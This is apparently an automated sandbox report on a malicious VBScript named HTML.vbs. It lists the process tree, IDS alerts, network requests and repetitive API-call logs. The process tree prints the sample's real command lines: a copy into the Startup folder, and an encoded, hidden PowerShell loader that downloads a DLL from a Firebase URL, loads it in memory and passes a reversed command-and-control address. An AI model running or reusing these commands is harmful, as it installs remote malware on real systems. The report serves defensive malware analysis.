Summary | ZeroBOX

HTML.vbs

Generic Malware Antivirus PWS SMTP KeyLogger Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 19, 2023, 5:46 p.m. Sept. 19, 2023, 5:49 p.m.
Size 207.0KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 46f70ee3296755c360c84380c1115ee0
SHA256 c80d4ee987b3bb1f0feac967743eeaed07927b6030d46d03753c0d90433caa8f
CRC32 B093D0DC
ssdeep 3072:FTVDEXEy7M2G0BTfS4lJGeB7wKsQi/6XRLPWfTkAzfew54roZ:nEXE42QvXRLPrw5h
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTML.vbs

    1020
    • cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"

      2136
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD

      2632
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"

        2828

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 142.251.222.202:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 198.46.178.152:80 -> 192.168.56.103:49172 2020425 ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 Exploit Kit Activity Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49171
142.251.222.202:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 CN=upload.video.google.com 09:ab:bf:f5:d0:04:69:59:e1:ea:ac:da:8b:68:cf:62:94:2e:50:38

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Ping statistics for 127.0.0.1: Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00268c18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002689d8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269458
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269018
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269518
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00269598
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1c28
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c21e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c21e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c21e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004c1968
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x780a1c
0x7809a6
0x7807ed
0x780070
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72ee2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x72ef264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72ef2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x72fa74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72fa7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x73031dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x73031e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x73031f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7303416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7483f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f47f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f44de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 e0 8b 4d dc ff 15 1c
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x783d05
registers.esp: 3207044
registers.edi: 3207068
registers.eax: 0
registers.ebp: 3207080
registers.edx: 195
registers.ebx: 41310652
registers.esi: 41347400
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.46.178.152/window/2/Runtime.txt
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a
request GET http://198.46.178.152/window/2/Runtime.txt
request GET https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2356
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2356
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02512000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02523000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02524000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02582000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02595000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02525000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0258c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02700000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02526000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0259c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02583000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02584000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02585000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02586000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02587000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02588000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02589000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04930000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04931000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04932000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04933000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04934000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04935000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04936000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04937000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04938000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04939000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
